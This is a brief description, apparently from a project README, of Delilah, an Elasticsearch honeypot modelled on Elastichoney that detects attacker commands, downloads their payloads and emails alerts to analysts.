Delilah Honeypot

Delilah is a honeypot system that draws inspiration from Jordan Wright’s Elastichoney. It is designed to detect and identify various types of malicious activities, including attack commands, reconnaissance attempts, and download commands.

It functions as a vulnerable Elasticsearch instance that detects and identifies attack commands, reconnaissance attempts, and download commands. Whenever an attacker issues a download command, Delilah will attempt to download the file that the attacker is trying to introduce onto a victim's system. When Delilah detects an attacker's commands, it sends a notification email to one or more specified email addresses, alerting analysts in real-time about incoming attacks. Delilah offers a range of configurable parameters to simulate Elasticsearch instances, making it difficult for an attacker to realize they are interacting with a honeypot. Multiple Delilah nodes can be installed to create a network of sensors. To facilitate easier monitoring of the sensor network, analysts should use the appropriate tools.